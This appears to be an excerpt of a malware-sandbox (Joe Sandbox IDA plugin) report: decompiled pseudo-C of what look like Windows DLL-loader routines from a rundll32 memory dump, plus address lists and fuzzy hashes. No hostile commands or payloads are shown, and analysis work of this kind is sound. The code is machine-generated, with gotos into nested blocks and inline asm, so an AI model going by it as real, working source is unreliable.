                                                                                            								 *((char*)(_v164 + _t363)) = 0;
                                                                                            								goto L5;
                                                                                            							} else {
                                                                                            								_t204 = 0xc000009a;
                                                                                            								goto L47;
                                                                                            							}
                                                                                            						}
                                                                                            					} else {
                                                                                            						_t200 = _t365[2];
                                                                                            						_v164 = _t200;
                                                                                            						if( *((char*)(_t200 + _t363)) != 0) {
                                                                                            							goto L109;
                                                                                            						} else {
                                                                                            							while(1) {
                                                                                            								L5:
                                                                                            								_t353 = 0;
                                                                                            								_t342 = 0x1000;
                                                                                            								_v176 = 0;
                                                                                            								if(_t287 == 0) {
                                                                                            									break;
                                                                                            								}
                                                                                            								_t384 = _t287 -  *0x46c7b90; // 0x77cf0000
                                                                                            								if(_t384 == 0) {
                                                                                            									_t353 =  *0x46c7b8c; // 0x29e2a08
                                                                                            									_v176 = _t353;
                                                                                            									_t63 = _t353 + 0x50; // 0x29e2ab8
                                                                                            									_t64 =  *_t63 + 0x20; // 0x9
                                                                                            									_t320 =  *_t64;
                                                                                            									_v184 = _t320;
                                                                                            								} else {
                                                                                            									E045F2280(_t200, 0x46c84d8);
                                                                                            									_t277 =  *0x46c85f4; // 0x29eba90
                                                                                            									_t351 =  *0x46c85f8 & 1;
                                                                                            									while(_t277 != 0) {
                                                                                            										_t21 = _t277 - 0x50; // 0x76280000
                                                                                            										_t337 =  *_t21;
                                                                                            										if(_t337 > _t287) {
                                                                                            											_t338 = _t337 | 0xffffffff;
                                                                                            										} else {
                                                                                            											asm("sbb ecx, ecx");
                                                                                            											_t338 =  ~_t337;
                                                                                            										}
                                                                                            										_t387 = _t338;
                                                                                            										if(_t387 < 0) {
                                                                                            											_t339 =  *_t277;
                                                                                            											__eflags = _t351;
                                                                                            											if(_t351 != 0) {
                                                                                            												__eflags = _t339;
                                                                                            												if(_t339 == 0) {
                                                                                            													goto L16;
                                                                                            												} else {
                                                                                            													goto L118;
                                                                                            												}
                                                                                            												goto L151;
                                                                                            											} else {
                                                                                            												goto L16;
                                                                                            											}
                                                                                            											goto L17;
                                                                                            										} else {
                                                                                            											if(_t387 <= 0) {
                                                                                            												__eflags = _t277;
                                                                                            												if(_t277 != 0) {
                                                                                            													_t23 = _t277 - 0x18; // 0x29ebad8
                                                                                            													_t340 =  *_t23;
                                                                                            													_t24 = _t277 - 0x68; // 0x29eba28
                                                                                            													_t353 = _t24;
                                                                                            													_v176 = _t353;
                                                                                            													__eflags =  *((intOrPtr*)(_t340 + 0xc)) - 0xffffffff;
                                                                                            													if( *((intOrPtr*)(_t340 + 0xc)) != 0xffffffff) {
                                                                                            														_t279 =  *_t340;
                                                                                            														__eflags =  *(_t279 - 0x20) & 0x00000020;
                                                                                            														if(( *(_t279 - 0x20) & 0x00000020) == 0) {
                                                                                            															asm("lock inc dword [edi+0x9c]");
                                                                                            															_t30 = _t353 + 0x50; // 0x29ebad8
                                                                                            															_t340 =  *_t30;
                                                                                            														}
                                                                                            													}
                                                                                            													_t31 = _t340 + 0x20; // 0x9
                                                                                            													_v184 =  *_t31;
                                                                                            												}
                                                                                            											} else {
                                                                                            												_t22 = _t277 + 4; // 0x29e2f78
                                                                                            												_t339 =  *_t22;
                                                                                            												if(_t351 != 0) {
                                                                                            													__eflags = _t339;
                                                                                            													if(_t339 == 0) {
                                                                                            														goto L16;
                                                                                            													} else {
                                                                                            														L118:
                                                                                            														_t277 = _t277 ^ _t339;
                                                                                            														goto L17;
                                                                                            													}
                                                                                            													goto L151;
                                                                                            												} else {
                                                                                            													L16:
                                                                                            													_t277 = _t339;
                                                                                            												}
                                                                                            												goto L17;
                                                                                            											}
                                                                                            										}
                                                                                            										goto L25;
                                                                                            										L17:
                                                                                            									}
                                                                                            									L25:
                                                                                            									E045EFFB0(_t287, _t353, 0x46c84d8);
                                                                                            									_t320 = _v184;
                                                                                            									_t342 = 0x1000;
                                                                                            								}
                                                                                            								if(_t353 == 0) {
                                                                                            									break;
                                                                                            								} else {
                                                                                            									_t366 = 0;
                                                                                            									if(( *( *[fs:0x18] + 0xfca) & _t342) != 0 || _t320 >= _v188) {
                                                                                            										_t288 = _v164;
                                                                                            										if(_t353 != 0) {
                                                                                            											_t342 = _t288;
                                                                                            											_t374 = E0462CC99(_t353, _t288, _v200, 1,  &_v168);
                                                                                            											if(_t374 >= 0) {
                                                                                            												if(_v184 == 7) {
                                                                                            													__eflags = _a20;
                                                                                            													if(__eflags == 0) {
                                                                                            														__eflags =  *( *[fs:0x18] + 0xfca) & 0x00001000;
                                                                                            														if(__eflags != 0) {
                                                                                            															_t271 = E045E6600(0x46c52d8);
                                                                                            															__eflags = _t271;
                                                                                            															if(__eflags == 0) {
                                                                                            																_t342 = 0;
                                                                                            																_v169 = _t271;
                                                                                            																_t374 = E045E7926( *(_t353 + 0x50), 0,  &_v169);
                                                                                            															}
                                                                                            														}
                                                                                            													}
                                                                                            												}
                                                                                            												if(_t374 < 0) {
                                                                                            													_v168 = 0;
                                                                                            												} else {
                                                                                            													if( *0x46cb239 != 0) {
                                                                                            														_t342 =  *(_t353 + 0x18);
                                                                                            														E0465E974(_v180,  *(_t353 + 0x18), __eflags, _v168, 0,  &_v168);
                                                                                            													}
                                                                                            													if( *0x46c8472 != 0) {
                                                                                            														_v192 = 0;
                                                                                            														_t342 =  *0x7ffe0330;
                                                                                            														_t361 =  *0x46cb218; // 0xc08a58ed
                                                                                            														asm("ror edi, cl");
                                                                                            														 *0x46cb1e0( &_v192, _t353, _v168, 0, _v180);
                                                                                            														 *(_t361 ^  *0x7ffe0330)();
                                                                                            														_t269 = _v192;
                                                                                            														_t353 = _v176;
                                                                                            														__eflags = _t269;
                                                                                            														if(__eflags != 0) {
                                                                                            															_v168 = _t269;
                                                                                            														}
                                                                                            													}
                                                                                            												}
                                                                                            											}
                                                                                            											if(_t374 == 0xc0000135 || _t374 == 0xc0000142) {
                                                                                            												_t366 = 0xc000007a;
                                                                                            											}
                                                                                            											_t247 =  *(_t353 + 0x50);
                                                                                            											if(_t247[3] == 0xffffffff) {
                                                                                            												L40:
                                                                                            												if(_t366 == 0xc000007a) {
                                                                                            													__eflags = _t288;
                                                                                            													if(_t288 == 0) {
                                                                                            														goto L136;
                                                                                            													} else {
                                                                                            														_t366 = 0xc0000139;
                                                                                            													}
                                                                                            													goto L54;
                                                                                            												}
                                                                                            											} else {
                                                                                            												_t249 =  *_t247;
                                                                                            												if(( *(_t249 - 0x20) & 0x00000020) != 0) {
                                                                                            													goto L40;
                                                                                            												} else {
                                                                                            													_t250 = _t249 | 0xffffffff;
                                                                                            													asm("lock xadd [edi+0x9c], eax");
                                                                                            													if((_t249 | 0xffffffff) == 0) {
                                                                                            														E045F2280(_t250, 0x46c84d8);
                                                                                            														_t342 =  *(_t353 + 0x54);
                                                                                            														_t165 = _t353 + 0x54; // 0x54
                                                                                            														_t252 = _t165;
                                                                                            														__eflags =  *(_t342 + 4) - _t252;
                                                                                            														if( *(_t342 + 4) != _t252) {
                                                                                            															L135:
                                                                                            															asm("int 0x29");
                                                                                            															L136:
                                                                                            															_t288 = _v200;
                                                                                            															_t366 = 0xc0000138;
                                                                                            															L54:
                                                                                            															_t342 = _t288;
                                                                                            															L04613898(0, _t288, _t366);
                                                                                            														} else {
                                                                                            															_t324 =  *(_t252 + 4);
                                                                                            															__eflags =  *_t324 - _t252;
                                                                                            															if( *_t324 != _t252) {
                                                                                            																goto L135;
                                                                                            															} else {
                                                                                            																 *_t324 = _t342;
                                                                                            																 *(_t342 + 4) = _t324;
                                                                                            																_t293 =  *(_t353 + 0x50);
                                                                                            																_v180 =  *_t293;
                                                                                            																E045EFFB0(_t293, _t353, 0x46c84d8);
                                                                                            																__eflags =  *((short*)(_t353 + 0x3a));
                                                                                            																if( *((short*)(_t353 + 0x3a)) != 0) {
                                                                                            																	_t342 = 0;
                                                                                            																	__eflags = 0;
                                                                                            																	E046137F5(_t353, 0);
                                                                                            																}
                                                                                            																E04610413(_t353);
                                                                                            																_t256 =  *(_t353 + 0x48);
                                                                                            																__eflags = _t256;
                                                                                            																if(_t256 != 0) {
                                                                                            																	__eflags = _t256 - 0xffffffff;
                                                                                            																	if(_t256 != 0xffffffff) {
                                                                                            																		E04609B10(_t256);
                                                                                            																	}
                                                                                            																}
                                                                                            																__eflags =  *(_t353 + 0x28);
                                                                                            																if( *(_t353 + 0x28) != 0) {
                                                                                            																	_t174 = _t353 + 0x24; // 0x24
                                                                                            																	E046002D6(_t174);
                                                                                            																}
                                                                                            																L045F77F0( *0x46c7b98, 0, _t353);
                                                                                            																__eflags = _v180 - _t293;
                                                                                            																if(__eflags == 0) {
                                                                                            																	E0460C277(_t293, _t366);
                                                                                            																}
                                                                                            																_t288 = _v164;
                                                                                            																goto L40;
                                                                                            															}
                                                                                            														}
                                                                                            													} else {
                                                                                            														goto L40;
                                                                                            													}
                                                                                            												}
                                                                                            											}
                                                                                            										}
                                                                                            									} else {
                                                                                            										L045EEC7F(_t353);
                                                                                            										L046019B8(_t287, 0, _t353, 0);
                                                                                            										_t200 = E045DF4E3(__eflags);
                                                                                            										continue;
                                                                                            									}
                                                                                            								}
                                                                                            								L41:
                                                                                            								if(_v157 != 0) {
                                                                                            									L045F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t288);
                                                                                            								}
                                                                                            								if(_t366 < 0) {
                                                                                            									L46:
                                                                                            									 *_v212 = _v168;
                                                                                            									_t204 = _t366;
                                                                                            									L47:
                                                                                            									_pop(_t354);
                                                                                            									_pop(_t367);
                                                                                            									_pop(_t289);
                                                                                            									return E0461B640(_t204, _t289, _v8 ^ _t376, _t342, _t354, _t367);
                                                                                            								} else {
                                                                                            									_t206 =  *0x46cb2f8; // 0x4b0000
                                                                                            									if((_t206 |  *0x46cb2fc) == 0 || ( *0x46cb2e4 & 0x00000001) != 0) {
                                                                                            										goto L46;
                                                                                            									} else {
                                                                                            										_t297 =  *0x46cb2ec; // 0x100
                                                                                            										_v200 = 0;
                                                                                            										if((_t297 >> 0x00000008 & 0x00000003) == 3) {
                                                                                            											_t355 = _v168;
                                                                                            											_t342 =  &_v208;
                                                                                            											_t208 = E04686B68(_v168,  &_v208, _v168, __eflags);
                                                                                            											__eflags = _t208 - 1;
                                                                                            											if(_t208 == 1) {
                                                                                            												goto L46;
                                                                                            											} else {
                                                                                            												__eflags = _v208 & 0x00000010;
                                                                                            												if((_v208 & 0x00000010) == 0) {
                                                                                            													goto L46;
                                                                                            												} else {
                                                                                            													_t342 = 4;
                                                                                            													_t366 = E04686AEB(_t355, 4,  &_v216);
                                                                                            													__eflags = _t366;
                                                                                            													if(_t366 >= 0) {
                                                                                            														goto L46;
                                                                                            													} else {
                                                                                            														asm("int 0x29");
                                                                                            														_t356 = 0;
                                                                                            														_v44 = 0;
                                                                                            														_t290 = _v52;
                                                                                            														__eflags = 0;
                                                                                            														if(0 == 0) {
                                                                                            															L108:
                                                                                            															_t356 = 0;
                                                                                            															_v44 = 0;
                                                                                            															goto L63;
                                                                                            														} else {
                                                                                            															__eflags = 0;
                                                                                            															if(0 < 0) {
                                                                                            																goto L108;
                                                                                            															}
                                                                                            															L63:
                                                                                            															_v112 = _t356;
                                                                                            															__eflags = _t356;
                                                                                            															if(_t356 == 0) {
                                                                                            																L143:
                                                                                            																_v8 = 0xfffffffe;
                                                                                            																_t211 = 0xc0000089;
                                                                                            															} else {
                                                                                            																_v36 = 0;
                                                                                            																_v60 = 0;
                                                                                            																_v48 = 0;
                                                                                            																_v68 = 0;
                                                                                            																_v44 = _t290 & 0xfffffffc;
                                                                                            																E045EE9C0(1, _t290 & 0xfffffffc, 0, 0,  &_v68);
                                                                                            																_t306 = _v68;
                                                                                            																__eflags = _t306;
                                                                                            																if(_t306 == 0) {
                                                                                            																	_t216 = 0xc000007b;
                                                                                            																	_v36 = 0xc000007b;
                                                                                            																	_t307 = _v60;
                                                                                            																} else {
                                                                                            																	__eflags = _t290 & 0x00000001;
                                                                                            																	if(__eflags == 0) {
                                                                                            																		_t349 =  *(_t306 + 0x18) & 0x0000ffff;
                                                                                            																		__eflags = _t349 - 0x10b;
                                                                                            																		if(_t349 != 0x10b) {
                                                                                            																			__eflags = _t349 - 0x20b;
                                                                                            																			if(_t349 == 0x20b) {
                                                                                            																				goto L102;
                                                                                            																			} else {
                                                                                            																				_t307 = 0;
                                                                                            																				_v48 = 0;
                                                                                            																				_t216 = 0xc000007b;
                                                                                            																				_v36 = 0xc000007b;
                                                                                            																				goto L71;
                                                                                            																			}
                                                                                            																		} else {
                                                                                            																			L102:
                                                                                            																			_t307 =  *(_t306 + 0x50);
                                                                                            																			goto L69;
                                                                                            																		}
                                                                                            																		goto L151;
                                                                                            																	} else {
                                                                                            																		_t239 = L045EEAEA(_t290, _t290, _t356, _t366, __eflags);
                                                                                            																		_t307 = _t239;
                                                                                            																		_v60 = _t307;
                                                                                            																		_v48 = _t307;
                                                                                            																		__eflags = _t307;
                                                                                            																		if(_t307 != 0) {
                                                                                            																			L70:
                                                                                            																			_t216 = _v36;
                                                                                            																		} else {
                                                                                            																			_push(_t239);
                                                                                            																			_push(0x14);
                                                                                            																			_push( &_v144);
                                                                                            																			_push(3);
                                                                                            																			_push(_v44);
                                                                                            																			_push(0xffffffff);
                                                                                            																			_t319 = E04619730();
                                                                                            																			_v36 = _t319;
                                                                                            																			__eflags = _t319;
                                                                                            																			if(_t319 < 0) {
                                                                                            																				_t216 = 0xc000001f;
                                                                                            																				_v36 = 0xc000001f;
                                                                                            																				_t307 = _v60;
                                                                                            																			} else {
                                                                                            																				_t307 = _v132;
                                                                                            																				L69:
                                                                                            																				_v48 = _t307;
                                                                                            																				goto L70;
                                                                                            																			}
                                                                                            																		}
                                                                                            																	}
                                                                                            																}
                                                                                            																L71:
                                                                                            																_v72 = _t307;
                                                                                            																_v84 = _t216;
                                                                                            																__eflags = _t216 - 0xc000007b;
                                                                                            																if(_t216 == 0xc000007b) {
                                                                                            																	L150:
                                                                                            																	_v8 = 0xfffffffe;
                                                                                            																	_t211 = 0xc000007b;
                                                                                            																} else {
                                                                                            																	_t344 = _t290 & 0xfffffffc;
                                                                                            																	_v76 = _t344;
                                                                                            																	__eflags = _v40 - _t344;
                                                                                            																	if(_v40 <= _t344) {
                                                                                            																		goto L150;
                                                                                            																	} else {
                                                                                            																		__eflags = _t307;
                                                                                            																		if(_t307 == 0) {
                                                                                            																			L75:
                                                                                            																			_t217 = 0;
                                                                                            																			_v104 = 0;
                                                                                            																			__eflags = _t366;
                                                                                            																			if(_t366 != 0) {
                                                                                            																				__eflags = _t290 & 0x00000001;
                                                                                            																				if((_t290 & 0x00000001) != 0) {
                                                                                            																					_t217 = 1;
                                                                                            																					_v104 = 1;
                                                                                            																				}
                                                                                            																				_t290 = _v44;
                                                                                            																				_v52 = _t290;
                                                                                            																			}
                                                                                            																			__eflags = _t217 - 1;
                                                                                            																			if(_t217 != 1) {
                                                                                            																				_t369 = 0;
                                                                                            																				_t218 = _v40;
                                                                                            																				goto L91;
                                                                                            																			} else {
                                                                                            																				_v64 = 0;
                                                                                            																				E045EE9C0(1, _t290, 0, 0,  &_v64);
                                                                                            																				_t309 = _v64;
                                                                                            																				_v108 = _t309;
                                                                                            																				__eflags = _t309;
                                                                                            																				if(_t309 == 0) {
                                                                                            																					goto L143;
                                                                                            																				} else {
                                                                                            																					_t226 =  *(_t309 + 0x18) & 0x0000ffff;
                                                                                            																					__eflags = _t226 - 0x10b;
                                                                                            																					if(_t226 != 0x10b) {
                                                                                            																						__eflags = _t226 - 0x20b;
                                                                                            																						if(_t226 != 0x20b) {
                                                                                            																							goto L143;
                                                                                            																						} else {
                                                                                            																							_t371 =  *(_t309 + 0x98);
                                                                                            																							goto L83;
                                                                                            																						}
                                                                                            																					} else {
                                                                                            																						_t371 =  *(_t309 + 0x88);
                                                                                            																						L83:
                                                                                            																						__eflags = _t371;
                                                                                            																						if(_t371 != 0) {
                                                                                            																							_v80 = _t371 - _t356 + _t290;
                                                                                            																							_t310 = _v64;
                                                                                            																							_t348 = _t310 + 0x18 + ( *(_t309 + 0x14) & 0x0000ffff);
                                                                                            																							_t292 =  *(_t310 + 6) & 0x0000ffff;
                                                                                            																							_t311 = 0;
                                                                                            																							__eflags = 0;
                                                                                            																							while(1) {
                                                                                            																								_v120 = _t311;
                                                                                            																								_v116 = _t348;
                                                                                            																								__eflags = _t311 - _t292;
                                                                                            																								if(_t311 >= _t292) {
                                                                                            																									goto L143;
                                                                                            																								}
                                                                                            																								_t359 =  *((intOrPtr*)(_t348 + 0xc));
                                                                                            																								__eflags = _t371 - _t359;
                                                                                            																								if(_t371 < _t359) {
                                                                                            																									L98:
                                                                                            																									_t348 = _t348 + 0x28;
                                                                                            																									_t311 = _t311 + 1;
                                                                                            																									continue;
                                                                                            																								} else {
                                                                                            																									__eflags = _t371 -  *((intOrPtr*)(_t348 + 0x10)) + _t359;
                                                                                            																									if(_t371 >=  *((intOrPtr*)(_t348 + 0x10)) + _t359) {
                                                                                            																										goto L98;
                                                                                            																									} else {
                                                                                            																										__eflags = _t348;
                                                                                            																										if(_t348 == 0) {
                                                                                            																											goto L143;
                                                                                            																										} else {
                                                                                            																											_t218 = _v40;
                                                                                            																											_t312 =  *_t218;
                                                                                            																											__eflags = _t312 -  *((intOrPtr*)(_t348 + 8));
                                                                                            																											if(_t312 >  *((intOrPtr*)(_t348 + 8))) {
                                                                                            																												_v100 = _t359;
                                                                                            																												_t360 = _v108;
                                                                                            																												_t372 = L045E8F44(_v108, _t312);
                                                                                            																												__eflags = _t372;
                                                                                            																												if(_t372 == 0) {
                                                                                            																													goto L143;
                                                                                            																												} else {
                                                                                            																													_t290 = _v52;
                                                                                            																													_t369 = _v80 +  *((intOrPtr*)(_t372 + 0xc)) - _v100 + _v112 - E04613C00(_t360, _t290,  *((intOrPtr*)(_t372 + 0xc)));
                                                                                            																													_t307 = _v72;
                                                                                            																													_t344 = _v76;
                                                                                            																													_t218 = _v40;
                                                                                            																													goto L91;
                                                                                            																												}
                                                                                            																											} else {
                                                                                            																												_t290 = _v52;
                                                                                            																												_t307 = _v72;
                                                                                            																												_t344 = _v76;
                                                                                            																												_t369 = _v80;
                                                                                            																												L91:
                                                                                            																												_t358 = _a4;
                                                                                            																												__eflags = _t358;
                                                                                            																												if(_t358 == 0) {
                                                                                            																													L95:
                                                                                            																													_t308 = _a8;
                                                                                            																													__eflags = _t308;
                                                                                            																													if(_t308 != 0) {
                                                                                            																														 *_t308 =  *((intOrPtr*)(_v40 + 4));
                                                                                            																													}
                                                                                            																													_v8 = 0xfffffffe;
                                                                                            																													_t211 = _v84;
                                                                                            																												} else {
                                                                                            																													_t370 =  *_t218 - _t369 + _t290;
                                                                                            																													 *_t358 = _t370;
                                                                                            																													__eflags = _t370 - _t344;
                                                                                            																													if(_t370 <= _t344) {
                                                                                            																														L149:
                                                                                            																														 *_t358 = 0;
                                                                                            																														goto L150;
                                                                                            																													} else {
                                                                                            																														__eflags = _t307;
                                                                                            																														if(_t307 == 0) {
                                                                                            																															goto L95;
                                                                                            																														} else {
                                                                                            																															__eflags = _t370 - _t344 + _t307;
                                                                                            																															if(_t370 >= _t344 + _t307) {
                                                                                            																																goto L149;
                                                                                            																															} else {
                                                                                            																																goto L95;
                                                                                            																															}
                                                                                            																														}
                                                                                            																													}
                                                                                            																												}
                                                                                            																											}
                                                                                            																										}
                                                                                            																									}
                                                                                            																								}
                                                                                            																								goto L97;
                                                                                            																							}
                                                                                            																						}
                                                                                            																						goto L143;
                                                                                            																					}
                                                                                            																				}
                                                                                            																			}
                                                                                            																		} else {
                                                                                            																			__eflags = _v40 - _t307 + _t344;
                                                                                            																			if(_v40 >= _t307 + _t344) {
                                                                                            																				goto L150;
                                                                                            																			} else {
                                                                                            																				goto L75;
                                                                                            																			}
                                                                                            																		}
                                                                                            																	}
                                                                                            																}
                                                                                            															}
                                                                                            															L97:
                                                                                            															 *[fs:0x0] = _v20;
                                                                                            															return _t211;
                                                                                            														}
                                                                                            													}
                                                                                            												}
                                                                                            											}
                                                                                            										} else {
                                                                                            											goto L46;
                                                                                            										}
                                                                                            									}
                                                                                            								}
                                                                                            								goto L151;
                                                                                            							}
                                                                                            							_t288 = _v164;
                                                                                            							_t366 = 0xc0000135;
                                                                                            							goto L41;
                                                                                            						}
                                                                                            					}
                                                                                            				}
                                                                                            				L151:
                                                                                            			}
                                                                                            0x045ed720
                                                                                            0x045ed726
                                                                                            0x045ed726
                                                                                            0x045ed72d
                                                                                            0x00000000
                                                                                            0x045ed733
                                                                                            0x045ed739
                                                                                            0x045ed742
                                                                                            0x045ed750
                                                                                            0x045ed758
                                                                                            0x045ed764
                                                                                            0x045ed776
                                                                                            0x045ed77a
                                                                                            0x045ed783
                                                                                            0x045ed928
                                                                                            0x045ed92c
                                                                                            0x045ed93d
                                                                                            0x045ed944
                                                                                            0x045ed94f
                                                                                            0x045ed954
                                                                                            0x045ed956
                                                                                            0x045ed95f
                                                                                            0x045ed961
                                                                                            0x045ed973
                                                                                            0x045ed973
                                                                                            0x045ed956
                                                                                            0x045ed944
                                                                                            0x045ed92c
                                                                                            0x045ed78b
                                                                                            0x0463b394
                                                                                            0x045ed791
                                                                                            0x045ed798
                                                                                            0x0463b3a3
                                                                                            0x0463b3bb
                                                                                            0x0463b3bb
                                                                                            0x045ed7a5
                                                                                            0x045ed866
                                                                                            0x045ed870
                                                                                            0x045ed884
                                                                                            0x045ed892
                                                                                            0x045ed898
                                                                                            0x045ed89e
                                                                                            0x045ed8a0
                                                                                            0x045ed8a6
                                                                                            0x045ed8ac
                                                                                            0x045ed8ae
                                                                                            0x045ed8b4
                                                                                            0x045ed8b4
                                                                                            0x045ed8ae
                                                                                            0x045ed7a5
                                                                                            0x045ed78b
                                                                                            0x045ed7b1
                                                                                            0x0463b3c5
                                                                                            0x0463b3c5
                                                                                            0x045ed7c3
                                                                                            0x045ed7ca
                                                                                            0x045ed7e5
                                                                                            0x045ed7eb
                                                                                            0x045ed8eb
                                                                                            0x045ed8ed
                                                                                            0x00000000
                                                                                            0x045ed8f3
                                                                                            0x045ed8f3
                                                                                            0x045ed8f3
                                                                                            0x00000000
                                                                                            0x045ed8ed
                                                                                            0x045ed7cc
                                                                                            0x045ed7cc
                                                                                            0x045ed7d2
                                                                                            0x00000000
                                                                                            0x045ed7d4
                                                                                            0x045ed7d4
                                                                                            0x045ed7d7
                                                                                            0x045ed7df
                                                                                            0x0463b3d4
                                                                                            0x0463b3d9
                                                                                            0x0463b3dc
                                                                                            0x0463b3dc
                                                                                            0x0463b3df
                                                                                            0x0463b3e2
                                                                                            0x0463b468
                                                                                            0x0463b46d
                                                                                            0x0463b46f
                                                                                            0x0463b46f
                                                                                            0x0463b475
                                                                                            0x045ed8f8
                                                                                            0x045ed8f9
                                                                                            0x045ed8fd
                                                                                            0x0463b3e8
                                                                                            0x0463b3e8
                                                                                            0x0463b3eb
                                                                                            0x0463b3ed
                                                                                            0x00000000
                                                                                            0x0463b3ef
                                                                                            0x0463b3ef
                                                                                            0x0463b3f1
                                                                                            0x0463b3f4
                                                                                            0x0463b3fe
                                                                                            0x0463b404
                                                                                            0x0463b409
                                                                                            0x0463b40e
                                                                                            0x0463b410
                                                                                            0x0463b410
                                                                                            0x0463b414
                                                                                            0x0463b414
                                                                                            0x0463b41b
                                                                                            0x0463b420
                                                                                            0x0463b423
                                                                                            0x0463b425
                                                                                            0x0463b427
                                                                                            0x0463b42a
                                                                                            0x0463b42d
                                                                                            0x0463b42d
                                                                                            0x0463b42a
                                                                                            0x0463b432
                                                                                            0x0463b436
                                                                                            0x0463b438
                                                                                            0x0463b43b
                                                                                            0x0463b43b
                                                                                            0x0463b449
                                                                                            0x0463b44e
                                                                                            0x0463b454
                                                                                            0x0463b458
                                                                                            0x0463b458
                                                                                            0x0463b45d
                                                                                            0x00000000
                                                                                            0x0463b45d
                                                                                            0x0463b3ed
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045ed7df
                                                                                            0x045ed7d2
                                                                                            0x045ed7ca
                                                                                            0x0463b37c
                                                                                            0x0463b37e
                                                                                            0x0463b385
                                                                                            0x0463b38a
                                                                                            0x00000000
                                                                                            0x0463b38a
                                                                                            0x045ed742
                                                                                            0x045ed7f1
                                                                                            0x045ed7f8
                                                                                            0x0463b49b
                                                                                            0x0463b49b
                                                                                            0x045ed800
                                                                                            0x045ed837
                                                                                            0x045ed843
                                                                                            0x045ed845
                                                                                            0x045ed847
                                                                                            0x045ed84a
                                                                                            0x045ed84b
                                                                                            0x045ed84e
                                                                                            0x045ed857
                                                                                            0x045ed802
                                                                                            0x045ed802
                                                                                            0x045ed80d
                                                                                            0x00000000
                                                                                            0x045ed818
                                                                                            0x045ed818
                                                                                            0x045ed824
                                                                                            0x045ed831
                                                                                            0x0463b4a5
                                                                                            0x0463b4ab
                                                                                            0x0463b4b3
                                                                                            0x0463b4b8
                                                                                            0x0463b4bb
                                                                                            0x00000000
                                                                                            0x0463b4c1
                                                                                            0x0463b4c1
                                                                                            0x0463b4c8
                                                                                            0x00000000
                                                                                            0x0463b4ce
                                                                                            0x0463b4d4
                                                                                            0x0463b4e1
                                                                                            0x0463b4e3
                                                                                            0x0463b4e5
                                                                                            0x00000000
                                                                                            0x0463b4eb
                                                                                            0x0463b4f0
                                                                                            0x0463b4f2
                                                                                            0x045edac9
                                                                                            0x045edacc
                                                                                            0x045edacf
                                                                                            0x045edad1
                                                                                            0x045edd78
                                                                                            0x045edd78
                                                                                            0x045edcf2
                                                                                            0x00000000
                                                                                            0x045edad7
                                                                                            0x045edad9
                                                                                            0x045edadb
                                                                                            0x00000000
                                                                                            0x00000000
                                                                                            0x045edae1
                                                                                            0x045edae1
                                                                                            0x045edae4
                                                                                            0x045edae6
                                                                                            0x0463b4f9
                                                                                            0x0463b4f9
                                                                                            0x0463b500
                                                                                            0x045edaec
                                                                                            0x045edaec
                                                                                            0x045edaf5
                                                                                            0x045edaf8
                                                                                            0x045edafb
                                                                                            0x045edb03
                                                                                            0x045edb11
                                                                                            0x045edb16
                                                                                            0x045edb19
                                                                                            0x045edb1b
                                                                                            0x0463b52c
                                                                                            0x0463b531
                                                                                            0x0463b534
                                                                                            0x045edb21
                                                                                            0x045edb21
                                                                                            0x045edb24
                                                                                            0x045edcd9
                                                                                            0x045edce2
                                                                                            0x045edce5
                                                                                            0x045edd6a
                                                                                            0x045edd6d
                                                                                            0x00000000
                                                                                            0x045edd73
                                                                                            0x0463b51a
                                                                                            0x0463b51c
                                                                                            0x0463b51f
                                                                                            0x0463b524
                                                                                            0x00000000
                                                                                            0x0463b524
                                                                                            0x045edce7
                                                                                            0x045edce7
                                                                                            0x045edce7
                                                                                            0x00000000
                                                                                            0x045edce7
                                                                                            0x00000000
                                                                                            0x045edb2a
                                                                                            0x045edb2c
                                                                                            0x045edb31
                                                                                            0x045edb33
                                                                                            0x045edb36
                                                                                            0x045edb39
                                                                                            0x045edb3b
                                                                                            0x045edb66
                                                                                            0x045edb66
                                                                                            0x045edb3d
                                                                                            0x045edb3d
                                                                                            0x045edb3e
                                                                                            0x045edb46
                                                                                            0x045edb47
                                                                                            0x045edb49
                                                                                            0x045edb4c
                                                                                            0x045edb53
                                                                                            0x045edb55
                                                                                            0x045edb58
                                                                                            0x045edb5a
                                                                                            0x0463b50a
                                                                                            0x0463b50f
                                                                                            0x0463b512
                                                                                            0x045edb60
                                                                                            0x045edb60
                                                                                            0x045edb63
                                                                                            0x045edb63
                                                                                            0x00000000
                                                                                            0x045edb63
                                                                                            0x045edb5a
                                                                                            0x045edb3b
                                                                                            0x045edb24
                                                                                            0x045edb69
                                                                                            0x045edb69
                                                                                            0x045edb6c

                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.952674254.00000000045B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 045B0000, based on PE: true
                                                                                            • Associated: 0000000A.00000002.952842210.00000000046CB000.00000040.00000800.00020000.00000000.sdmp
                                                                                            • Associated: 0000000A.00000002.952873557.00000000046CF000.00000040.00000800.00020000.00000000.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_45b0000_rundll32.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 22218ab7f87e0681f91b3a7e0813dcfe3bbf0c9605c922f0915cfc84fdf1bb04
                                                                                            • Instruction ID: 0a8f0f7635eac175eb5ceae9ca0fe47fee256d88416c4406164dd0f0b770dad0
                                                                                            • Opcode Fuzzy Hash: 22218ab7f87e0681f91b3a7e0813dcfe3bbf0c9605c922f0915cfc84fdf1bb04
                                                                                            • Instruction Fuzzy Hash: A7E1A070A0036ACFEB28DF25D884B79B7B2BF85708F044199D9099B291E734BD89DF51
                                                                                            Uniqueness

                                                                                            Uniqueness Score: -1.00%

                                                                                            C-Code - Quality: 92%
                                                                                            			E045E849B(signed int __ebx, intOrPtr __ecx, signed int __edi, signed int __esi, void* __eflags) {
                                                                                            				void* _t136;
                                                                                            				signed int _t139;
                                                                                            				signed int _t141;
                                                                                            				signed int _t145;
                                                                                            				intOrPtr _t146;
                                                                                            				signed int _t149;
                                                                                            				signed int _t150;
                                                                                            				signed int _t161;
                                                                                            				signed int _t163;
                                                                                            				signed int _t165;
                                                                                            				signed int _t169;
                                                                                            				signed int _t171;
                                                                                            				signed int _t194;
                                                                                            				signed int _t200;
                                                                                            				void* _t201;
                                                                                            				signed int _t204;
                                                                                            				signed int _t206;
                                                                                            				signed int _t210;
                                                                                            				signed int _t214;
                                                                                            				signed int _t215;
                                                                                            				signed int _t218;
                                                                                            				void* _t221;
                                                                                            				signed int _t224;
